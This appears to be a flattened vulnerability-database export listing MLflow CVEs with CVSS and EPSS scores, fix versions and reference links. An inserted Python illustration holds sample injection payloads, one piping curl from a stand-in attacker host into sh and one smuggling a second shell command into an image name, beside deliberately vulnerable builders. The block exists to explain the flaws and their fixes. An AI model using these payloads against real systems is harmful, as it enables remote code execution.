scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://github.com/mlflow/mlflow/commit/5f98ff98659dddb188591ecf6b10a4e276a0dba7
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/5f98ff98659dddb188591ecf6b10a4e276a0dba7
3
reference_url https://github.com/mlflow/mlflow/commit/e7dc0574fa3459e0003cfeb68d4e4a625491f03d
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/e7dc0574fa3459e0003cfeb68d4e4a625491f03d
4
reference_url https://www.zerodayinitiative.com/advisories/ZDI-25-931
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.zerodayinitiative.com/advisories/ZDI-25-931
5
reference_url https://github.com/B-Step62/mlflow/commit/2e02bc7bb70df243e6eb792689d9b8eba0013161
reference_id 2e02bc7bb70df243e6eb792689d9b8eba0013161
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-31T03:55:31Z/
url https://github.com/B-Step62/mlflow/commit/2e02bc7bb70df243e6eb792689d9b8eba0013161
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-11201
reference_id CVE-2025-11201
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-11201
7
reference_url https://github.com/advisories/GHSA-5cvj-7rg6-jggj
reference_id GHSA-5cvj-7rg6-jggj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5cvj-7rg6-jggj
8
reference_url https://www.zerodayinitiative.com/advisories/ZDI-25-931/
reference_id ZDI-25-931
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-31T03:55:31Z/
url https://www.zerodayinitiative.com/advisories/ZDI-25-931/
fixed_packages
0
url pkg:pypi/mlflow@2.22.4
purl pkg:pypi/mlflow@2.22.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-97xj-trtn-g7ah
7
vulnerability VCID-9mak-nkua-3uhr
8
vulnerability VCID-axte-ftrh-4bb7
9
vulnerability VCID-fxtg-yezw-hfhr
10
vulnerability VCID-kqsy-qu8j-8ugj
11
vulnerability VCID-scm3-63j1-tkf2
12
vulnerability VCID-tnps-h89q-a7hj
13
vulnerability VCID-w5et-zcp1-zfdb
14
vulnerability VCID-wphf-gk61-8ube
15
vulnerability VCID-xdur-8vs8-jfcy
16
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@2.22.4
1
url pkg:pypi/mlflow@3.0.0
purl pkg:pypi/mlflow@3.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-97xj-trtn-g7ah
7
vulnerability VCID-9mak-nkua-3uhr
8
vulnerability VCID-axte-ftrh-4bb7
9
vulnerability VCID-fxtg-yezw-hfhr
10
vulnerability VCID-kqsy-qu8j-8ugj
11
vulnerability VCID-scm3-63j1-tkf2
12
vulnerability VCID-tnps-h89q-a7hj
13
vulnerability VCID-w5et-zcp1-zfdb
14
vulnerability VCID-wphf-gk61-8ube
15
vulnerability VCID-xdur-8vs8-jfcy
16
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.0.0
aliases CVE-2025-11201, GHSA-5cvj-7rg6-jggj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k79p-ju8g-9bhe
11
url VCID-kqsy-qu8j-8ugj
vulnerability_id VCID-kqsy-qu8j-8ugj
summary
MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access-control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access.

This issue affects MLflow versions through 3.10.1.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33866.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33866.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33866
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.0138
published_at 2026-06-14T12:55:00Z
1
value 9e-05
scoring_system epss
scoring_elements 0.01029
published_at 2026-06-12T12:55:00Z
2
value 9e-05
scoring_system epss
scoring_elements 0.01032
published_at 2026-06-11T12:55:00Z
3
value 9e-05
scoring_system epss
scoring_elements 0.01036
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33866
2
reference_url https://cert.pl/en/posts/2026/04/CVE-2026-33865
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://cert.pl/en/posts/2026/04/CVE-2026-33865
3
reference_url https://github.com/advisories/GHSA-46r5-x6jq-v8g6
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-46r5-x6jq-v8g6
4
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
5
reference_url https://github.com/mlflow/mlflow/commit/005b959cacda05d1423356cfcbd9ebeda8ff96a7
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/005b959cacda05d1423356cfcbd9ebeda8ff96a7
6
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2026-94.yaml
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2026-94.yaml
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33866
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33866
8
reference_url https://github.com/mlflow/mlflow/pull/21708
reference_id 21708
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:12:33Z/
url https://github.com/mlflow/mlflow/pull/21708
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2455900
reference_id 2455900
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2455900
10
reference_url https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
reference_id attacking-mlflow-how-ml-artifacts-become-attack-vectors
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:12:33Z/
url https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
11
reference_url https://cert.pl/en/posts/2026/04/CVE-2026-33865/
reference_id CVE-2026-33865
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:12:33Z/
url https://cert.pl/en/posts/2026/04/CVE-2026-33865/
fixed_packages
0
url pkg:pypi/mlflow@3.11.0rc0
purl pkg:pypi/mlflow@3.11.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-fxtg-yezw-hfhr
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.11.0rc0
aliases BIT-mlflow-2026-33866, CVE-2026-33866, GHSA-46r5-x6jq-v8g6, PYSEC-2026-94
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kqsy-qu8j-8ugj
12
url VCID-scm3-63j1-tkf2
vulnerability_id VCID-scm3-63j1-tkf2
summary A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_install_model_dependencies_to_env()` function. When deploying a model with `env_manager=LOCAL`, MLflow reads dependency specifications from the model artifact's `python_env.yaml` file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model. The vulnerability affects version 3.8.0 and is fixed in version 3.8.2.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15379.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15379.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-15379
reference_id
reference_type
scores
0
value 0.00281
scoring_system epss
scoring_elements 0.51978
published_at 2026-06-14T12:55:00Z
1
value 0.00281
scoring_system epss
scoring_elements 0.51994
published_at 2026-06-13T12:55:00Z
2
value 0.00281
scoring_system epss
scoring_elements 0.51851
published_at 2026-06-11T12:55:00Z
3
value 0.00281
scoring_system epss
scoring_elements 0.51981
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-15379
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/commit/a22ce7157f646bdce4c95106fc38ccc9ca289205
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/a22ce7157f646bdce4c95106fc38ccc9ca289205
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-15379
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-15379
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2452949
reference_id 2452949
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2452949
6
reference_url https://github.com/mlflow/mlflow/commit/361b6f620adf98385c6721e384fb5ef9a30bb05e
reference_id 361b6f620adf98385c6721e384fb5ef9a30bb05e
reference_type
scores
0
value 10
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-31T03:55:37Z/
url https://github.com/mlflow/mlflow/commit/361b6f620adf98385c6721e384fb5ef9a30bb05e
7
reference_url https://huntr.com/bounties/dc9c1c20-7879-4050-87df-4d095fe5ca75
reference_id dc9c1c20-7879-4050-87df-4d095fe5ca75
reference_type
scores
0
value 10
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-31T03:55:37Z/
url https://huntr.com/bounties/dc9c1c20-7879-4050-87df-4d095fe5ca75
8
reference_url https://github.com/advisories/GHSA-r23q-823p-vmf7
reference_id GHSA-r23q-823p-vmf7
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r23q-823p-vmf7
fixed_packages
0
url pkg:pypi/mlflow@3.8.1
purl pkg:pypi/mlflow@3.8.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-9mak-nkua-3uhr
5
vulnerability VCID-axte-ftrh-4bb7
6
vulnerability VCID-fxtg-yezw-hfhr
7
vulnerability VCID-kqsy-qu8j-8ugj
8
vulnerability VCID-scm3-63j1-tkf2
9
vulnerability VCID-wphf-gk61-8ube
10
vulnerability VCID-xdur-8vs8-jfcy
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.8.1
1
url pkg:pypi/mlflow@3.9.0rc0
purl pkg:pypi/mlflow@3.9.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-axte-ftrh-4bb7
5
vulnerability VCID-fxtg-yezw-hfhr
6
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0rc0
aliases CVE-2025-15379, GHSA-r23q-823p-vmf7
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-scm3-63j1-tkf2
13
url VCID-tnps-h89q-a7hj
vulnerability_id VCID-tnps-h89q-a7hj
summary A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-14287.json
reference_id
reference_type
scores
0
value 7.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-14287.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-14287
reference_id
reference_type
scores
0
value 0.0034
scoring_system epss
scoring_elements 0.5719
published_at 2026-06-12T12:55:00Z
1
value 0.0034
scoring_system epss
scoring_elements 0.57198
published_at 2026-06-14T12:55:00Z
2
value 0.0034
scoring_system epss
scoring_elements 0.57072
published_at 2026-06-11T12:55:00Z
3
value 0.0034
scoring_system epss
scoring_elements 0.57204
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-14287
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/commit/8b8792a7034fb33a14b0b31cabcaa9b912d3485f
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/8b8792a7034fb33a14b0b31cabcaa9b912d3485f
4
reference_url https://github.com/mlflow/mlflow/pull/19277
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/pull/19277
5
reference_url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-14287
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-14287
7
reference_url https://huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
reference_id 229cd526-41aa-4819-b6f0-e2d0371c89e3
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-17T03:55:37Z/
url https://huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2447690
reference_id 2447690
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2447690
9
reference_url https://github.com/advisories/GHSA-xch3-2f9x-wh9f
reference_id GHSA-xch3-2f9x-wh9f
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xch3-2f9x-wh9f
fixed_packages
0
url pkg:pypi/mlflow@3.8.0rc0
purl pkg:pypi/mlflow@3.8.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-9mak-nkua-3uhr
5
vulnerability VCID-axte-ftrh-4bb7
6
vulnerability VCID-fxtg-yezw-hfhr
7
vulnerability VCID-kqsy-qu8j-8ugj
8
vulnerability VCID-scm3-63j1-tkf2
9
vulnerability VCID-wphf-gk61-8ube
10
vulnerability VCID-xdur-8vs8-jfcy
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.8.0rc0
aliases CVE-2025-14287, GHSA-xch3-2f9x-wh9f
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tnps-h89q-a7hj
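The two command-injection entries above (CVE-2025-15379, dependency strings from `python_env.yaml`; CVE-2025-14287, the `--container` image name) share one root cause: untrusted text spliced into a shell line. The block below is an added illustration, not MLflow's code. The function names, the sample dependency lists and the image references are constructed; the allow-list grammars are deliberately narrow stand-ins for a real PEP 508 parser and a real OCI reference parser.

```python
import re

# Constructed sample inputs. The first list plays the role of the dependency
# entries read from a model artifact's python_env.yaml; the second is the same
# channel carrying a shell payload. The image names stand in for a --container
# argument. Function names are hypothetical, not MLflow's.
BENIGN_DEPS = ["mlflow==3.8.0", "scikit-learn>=1.4,<2", "numpy"]
MALICIOUS_DEPS = ["numpy; curl http://attacker.invalid/x | sh #"]
BENIGN_IMAGE = "123456789012.dkr.ecr.us-east-1.amazonaws.com/mlflow-pyfunc:3.8.0"
MALICIOUS_IMAGE = "mlflow-pyfunc:latest; id > /tmp/pwned"

# Allow-list grammar for a requirement line: distribution name, optional
# extras, optional comma-separated version clauses. A leading "-" is rejected,
# so "-e git+..." and "--index-url ..." cannot smuggle pip options either.
_VERSION = r"(?:==|!=|<=|>=|<|>|~=|===)\s*[A-Za-z0-9.*+!-]+"
_REQUIREMENT_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?"   # name
    r"(?:\[[A-Za-z0-9._,\s-]+\])?"                     # [extras]
    r"(?:\s*" + _VERSION + r"(?:\s*,\s*" + _VERSION + r")*)?$"
)

# Allow-list grammar for an OCI image reference: host[:port]/path[:tag][@sha256:hex]
_IMAGE_RE = re.compile(
    r"^[a-z0-9]+(?:[._-][a-z0-9]+)*"
    r"(?:(?::[0-9]+)?/[a-z0-9]+(?:[._-][a-z0-9]+)*)*"
    r"(?::[A-Za-z0-9_][A-Za-z0-9._-]{0,127})?"
    r"(?:@sha256:[a-f0-9]{64})?$"
)


def vulnerable_install_command(deps):
    """The pattern behind CVE-2025-15379: attacker-controlled strings are
    interpolated into one shell line, so ';', '|' and '$(...)' all work."""
    return f"pip install {' '.join(deps)}"


def vulnerable_container_command(image):
    """The pattern behind CVE-2025-14287: an os.system()-style shell string."""
    return f"docker run --rm {image}"


def safe_install_argv(deps):
    """Validate every specifier, then build an argv list for subprocess.run
    without a shell. Validation still matters: argv alone stops shell
    metacharacters but not pip option injection."""
    for dep in deps:
        if not _REQUIREMENT_RE.match(dep):
            raise ValueError(f"rejected dependency specifier: {dep!r}")
    return ["pip", "install", "--no-input", *deps]


def safe_container_argv(image):
    if not _IMAGE_RE.match(image):
        raise ValueError(f"rejected container image reference: {image!r}")
    return ["docker", "run", "--rm", image]


def is_rejected(func, *args):
    """Report whether validation refused the input, without try/except at call sites."""
    try:
        func(*args)
    except ValueError:
        return True
    return False
```

The argv lists are what you would hand to `subprocess.run(argv, check=True)`; the shell-string builders are kept only to show what reaches `/bin/sh` in the vulnerable shape. The requirement grammar deliberately refuses PEP 508 direct references (`name @ https://...`), since an artifact that can point pip at an arbitrary URL is a supply-chain problem in its own right.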
14
url VCID-w5et-zcp1-zfdb
vulnerability_id VCID-w5et-zcp1-zfdb
summary In mlflow version 2.20.3, the temporary directory used for creating Python virtual environments is assigned insecure world-writable permissions (0o777). This vulnerability allows an attacker with write access to the `/tmp` directory to exploit a race condition and overwrite `.py` files in the virtual environment, leading to arbitrary code execution. The issue is resolved in version 3.4.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-10279
reference_id
reference_type
scores
0
value 7e-05
scoring_system epss
scoring_elements 0.00684
published_at 2026-06-11T12:55:00Z
1
value 7e-05
scoring_system epss
scoring_elements 0.00688
published_at 2026-06-14T12:55:00Z
2
value 7e-05
scoring_system epss
scoring_elements 0.00682
published_at 2026-06-12T12:55:00Z
3
value 7e-05
scoring_system epss
scoring_elements 0.00683
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-10279
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://huntr.com/bounties/01d3b81e-13d1-43aa-b91a-443aec68bdc8
reference_id 01d3b81e-13d1-43aa-b91a-443aec68bdc8
reference_type
scores
0
value 7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-02T17:48:06Z/
url https://huntr.com/bounties/01d3b81e-13d1-43aa-b91a-443aec68bdc8
3
reference_url https://github.com/mlflow/mlflow/commit/1d7c8d4cf0a67d407499a8a4ffac387ea4f8194a
reference_id 1d7c8d4cf0a67d407499a8a4ffac387ea4f8194a
reference_type
scores
0
value 7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-02T17:48:06Z/
url https://github.com/mlflow/mlflow/commit/1d7c8d4cf0a67d407499a8a4ffac387ea4f8194a
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-10279
reference_id CVE-2025-10279
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-10279
5
reference_url https://github.com/advisories/GHSA-4x5p-f36r-mxxr
reference_id GHSA-4x5p-f36r-mxxr
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4x5p-f36r-mxxr
